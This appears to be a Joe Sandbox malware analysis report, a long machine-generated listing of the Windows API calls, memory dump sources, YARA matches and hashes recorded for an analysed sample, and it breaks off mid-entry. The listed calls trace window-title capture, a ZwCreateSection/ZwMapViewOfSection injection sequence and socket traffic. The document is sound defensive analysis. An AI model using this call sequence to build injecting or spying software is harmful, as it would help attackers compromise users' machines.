• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
Similarity
• API ID: String
• String ID:
• API String ID: 2568140703-0
APIs
• GetForegroundWindow.USER32 ref: 00079C83
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00079C96
Memory Dump Source
• Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_60000_task.jbxd
Yara matches
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,000CFADC,000D2318,00000000,000734C8,00000000,00000001), ref: 0007324B
• WSASetLastError.WS2_32(00000000), ref: 00073250
  • Part of subcall function 000730BE: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0007310A
  • Part of subcall function 000730BE: LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00073150
  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0007316A
  • Part of subcall function 000730BE: FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 00073175
  • Part of subcall function 000730BE: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731B2
  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000731C4
  • Part of subcall function 000730BE: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000731CF
  • Part of subcall function 000730BE: GetProcAddress.KERNEL32(00000000,000C8568), ref: 000731DE
Memory Dump Source
• Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_60000_task.jbxd
Yara matches
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-0
APIs
• GetLastError.KERNEL32(-00000004,00000001,6FE987DD,6FE9887D,?,6FE980F4,00000000,00000000), ref: 6FE9AA95
• SetLastError.KERNEL32(00000000), ref: 6FE9AB37
Memory Dump Source
• Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
• Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0007647F
  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 00076486
  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00076497
  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 0007649E
  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000764AF
  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 000764B6
  • Part of subcall function 00076447: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000764C7
  • Part of subcall function 00076447: GetProcAddress.KERNEL32(00000000), ref: 000764CE
  • Part of subcall function 00076447: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,0006421E), ref: 0007656E
  • Part of subcall function 00076447: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00076586
• CloseHandle.KERNEL32(0006421E,?,?,0006421E,000C2544), ref: 000768B1
• CloseHandle.KERNEL32(000C2544,?,?,0006421E,000C2544), ref: 000768BA
Memory Dump Source
• Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_60000_task.jbxd
Yara matches
Similarity
• API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
• String ID:
• API String ID: 2948481953-0
                                                                                                                                                                • Opcode ID: e6fb296e694c9de75f10e462aa832efd80165a7e4a148c125885101d4713d854
                                                                                                                                                                • Instruction ID: 1edcf07198b04f4dc56f4b55d38fe65dd53ab13d90da623fc141cd1ed3ece94f
                                                                                                                                                                • Opcode Fuzzy Hash: e6fb296e694c9de75f10e462aa832efd80165a7e4a148c125885101d4713d854
                                                                                                                                                                • Instruction Fuzzy Hash: 49D0A776C4110E6FEF007BE4EC4A8EEBB7CFB05200B400661F825432129B7B58188A61
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?), ref: 025501C5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                • Opcode ID: 55d26a63db634c472364b674c926414e42fb2d9adb41b72ab935940c75f72a8a
                                                                                                                                                                • Instruction ID: 616806f2f795fc8ae9b0b2426eac5766c68bb8f94d4dfb2e04c6cb9776e3058d
                                                                                                                                                                • Opcode Fuzzy Hash: 55d26a63db634c472364b674c926414e42fb2d9adb41b72ab935940c75f72a8a
                                                                                                                                                                • Instruction Fuzzy Hash: 6D617435A00225DFDB24CF58C9A07B9BBB0FF48318F6944AADC4A9B391E731E945CB54
                                                                                                                                                                APIs
                                                                                                                                                                • GetCPInfo.KERNEL32(FFFFF9B5,?,00000005,6FE9BC61,?), ref: 6FE9BA57
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Info
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1807457897-0
                                                                                                                                                                • Opcode ID: 79ac5b7a5aee119624ee7870946a3377b6f59000718cc865686bfb434d70c3aa
                                                                                                                                                                • Instruction ID: 9fd9c0ea7a0b66473ff34bdef7cd5b8323b97d63cdf6c1294707d51a0c9367d2
                                                                                                                                                                • Opcode Fuzzy Hash: 79ac5b7a5aee119624ee7870946a3377b6f59000718cc865686bfb434d70c3aa
                                                                                                                                                                • Instruction Fuzzy Hash: 6451F6B1D08158AADB118F68CD84BE9BFA9FF56308F2001E9D59887186D375AA85CB70
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                • Opcode ID: cd0eb3994c8bd008d9a23688d75a3a0b9d15e76f7528c9983b63340eef898031
                                                                                                                                                                • Instruction ID: 32073135359276f2948e3953240b88bf5b41356057c12188220991d682f047ea
                                                                                                                                                                • Opcode Fuzzy Hash: cd0eb3994c8bd008d9a23688d75a3a0b9d15e76f7528c9983b63340eef898031
                                                                                                                                                                • Instruction Fuzzy Hash: C9217171B04509ABCB15FFB588966FEB7ABEF84320F104529F415EB282DF355E0187A1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                • Opcode ID: 921a7d86230c99c84749226ad4fdd7b3c1b5b4bbbf89fa15fb2fbf618dd149c0
                                                                                                                                                                • Instruction ID: 6023d8ed5731d8d1641b1ec4a67aafa4fcffb198c123dfeaacfa6375ecb59b18
                                                                                                                                                                • Opcode Fuzzy Hash: 921a7d86230c99c84749226ad4fdd7b3c1b5b4bbbf89fa15fb2fbf618dd149c0
                                                                                                                                                                • Instruction Fuzzy Hash: F321A171B00605ABCF14FFA9C896AFEB7ABAF85310F104129F415EB282DF355E0197A1
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 025503A3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 57c5b5104becd6d9dc66942e152c5083eadbbc544259d5cd2c708d68f60595ad
                                                                                                                                                                • Instruction ID: 3e8c979168462f68d5eab04a626101ada0f597066dce117460d788b0826ac07b
                                                                                                                                                                • Opcode Fuzzy Hash: 57c5b5104becd6d9dc66942e152c5083eadbbc544259d5cd2c708d68f60595ad
                                                                                                                                                                • Instruction Fuzzy Hash: EB21B036619616DBCB18CF9DD4A0AADBBB4FF49314F05429AEC4ADB341C370E985CB84
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 26cfe8e3a973c7e4c15f0e9eedfd9baeaef6fa04c7bc278cf98cf34126bfe647
                                                                                                                                                                • Instruction ID: 8892f2a4027a2665dfd8a835897b1ca0d45594b543cab6aa120dee167842f6c5
                                                                                                                                                                • Opcode Fuzzy Hash: 26cfe8e3a973c7e4c15f0e9eedfd9baeaef6fa04c7bc278cf98cf34126bfe647
                                                                                                                                                                • Instruction Fuzzy Hash: CD11EFB2B20105EFD7609E19C840A26B7AAEF51310F558398E609DB252DB75EC52C694
                                                                                                                                                                APIs
                                                                                                                                                                • SetThreadStackGuarantee.KERNEL32(?), ref: 6FE7D70B
                                                                                                                                                                  • Part of subcall function 6FE4C770: HeapFree.KERNEL32(00000000,0000000C), ref: 6FE7A128
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeGuaranteeHeapStackThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4181682901-0
                                                                                                                                                                • Opcode ID: 1bf274d5b2f435c6df848d0016b81872b81da02abfb7e4cc8e89ad5dd5d01282
                                                                                                                                                                • Instruction ID: 2babb90818476930331a98f0ce729831393179f0d8a3adebaf1f04af03f2c957
                                                                                                                                                                • Opcode Fuzzy Hash: 1bf274d5b2f435c6df848d0016b81872b81da02abfb7e4cc8e89ad5dd5d01282
                                                                                                                                                                • Instruction Fuzzy Hash: 9211ACB5D002089FCB10DF98D845BDEBFB8FB09724F104129E908A7380D336AA55CFA4
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE51317), ref: 6FE67779
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 1e0eeb622614569cc192af6dddd4ffb70f559f627c7f94d2c63aca0149b699db
                                                                                                                                                                • Instruction ID: c07f4b09c03e7186aec7e3b22fe73bbbb49f2f70aa2642894fcedf34898b11e0
                                                                                                                                                                • Opcode Fuzzy Hash: 1e0eeb622614569cc192af6dddd4ffb70f559f627c7f94d2c63aca0149b699db
                                                                                                                                                                • Instruction Fuzzy Hash: 511145B49493068FC304DF28D184A1ABBF1BF89714F11896EF8999B350DB74EA44CF96
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00084BB3: recv.WS2_32(?,?,?,?), ref: 00084BBE
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00084AFD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastrecv
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2514157807-0
                                                                                                                                                                • Opcode ID: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                                                                                                • Instruction ID: e15b10776b380165d2124998179bc0a317ad43d74e0dc8d1e3251df2f4b3f8ea
                                                                                                                                                                • Opcode Fuzzy Hash: f2ed9efc29f8101d6ef1120ec222f35c5d439f01bd60f1326fd1fba732be379b
                                                                                                                                                                • Instruction Fuzzy Hash: 0BF0623520C11A5EDF1CB999ECA5A7933C5FF49334B30436AFAB986AF1EB25D8502701
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6FE9AADE,00000001,00000364,00000000,00000002,000000FF,?,6FE980F4,00000000,00000000), ref: 6FE9882C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 0c722ad3555e7698eea79dafa1afd7fa877e140b789094e63535134282dcf4a3
                                                                                                                                                                • Instruction ID: 09c03cafd106b45050000cbb4c3bc5990f962ec856038ebfed7eb92e25f36576
                                                                                                                                                                • Opcode Fuzzy Hash: 0c722ad3555e7698eea79dafa1afd7fa877e140b789094e63535134282dcf4a3
                                                                                                                                                                • Instruction Fuzzy Hash: 35F0B43264E6255AEB315B658800A9B3F48AF527B8BF04127AC14D62F0CB30E602C3F0
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000A3989,00000001,00000364,?,000A0866,00000001,00000001), ref: 000A0FB5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: c25866964b6a2d6d6d61aa4e670fd49238fd7c187ff9ee8b3377f0e461a9ecb0
                                                                                                                                                                • Instruction ID: cd823adb235f45aa420ed7c465ecf7736b6a283ea5f0c37f1c5a543c3840c105
                                                                                                                                                                • Opcode Fuzzy Hash: c25866964b6a2d6d6d61aa4e670fd49238fd7c187ff9ee8b3377f0e461a9ecb0
                                                                                                                                                                • Instruction Fuzzy Hash: 3CF0BB3160512D6EEF715AE29C05B9B3788AF437A0B158131A808F6580CB71DC0182E1
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00084BCC: send.WS2_32(?,?,?,?), ref: 00084BD7
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 00084B6E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastsend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1802528911-0
                                                                                                                                                                • Opcode ID: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                                                                                                • Instruction ID: 89869af2ac74289879ab60062c563e9c63dae7504dd1f46eed828c0383960578
                                                                                                                                                                • Opcode Fuzzy Hash: 56a01c97fea5148d169d396be95ef90d72e0cb9545c730587fd84c0222672ff3
                                                                                                                                                                • Instruction Fuzzy Hash: 97F0B43520C1265ADF28B96DECA4A7C3785FF45330B30436AF6BA869F1EB25D8505311
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                                • Opcode ID: 6a880788fccffb7a6852245d2a4ab63d2dabddf777da5d8c624b978478869ea5
                                                                                                                                                                • Instruction ID: d333d6c4ad3f85cc38a285b68f6202d91673c9221154f4c61c0439e671ddfdfe
                                                                                                                                                                • Opcode Fuzzy Hash: 6a880788fccffb7a6852245d2a4ab63d2dabddf777da5d8c624b978478869ea5
                                                                                                                                                                • Instruction Fuzzy Hash: 35F0E933A08714ABD710E675C942BCBB7ECBF04354F1005A9D99DD3142E766E704DBA1
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                • Opcode ID: 2c42abdd51519a159d0419ddf3c92282655855e4f16efef280cacd90e6989226
                                                                                                                                                                • Instruction ID: 2c1e3d41dc0c865cc052b425e949689a144e00a143debfe51a0b65bb8c9d47e4
                                                                                                                                                                • Opcode Fuzzy Hash: 2c42abdd51519a159d0419ddf3c92282655855e4f16efef280cacd90e6989226
                                                                                                                                                                • Instruction Fuzzy Hash: DDE06531E00A22DAEA712AF69C00BEB76889F837A0F154120AD06D61D1DF64CD0285E6
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(007B0000,?,?,?,6FE7A0EC), ref: 6FE7C165
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
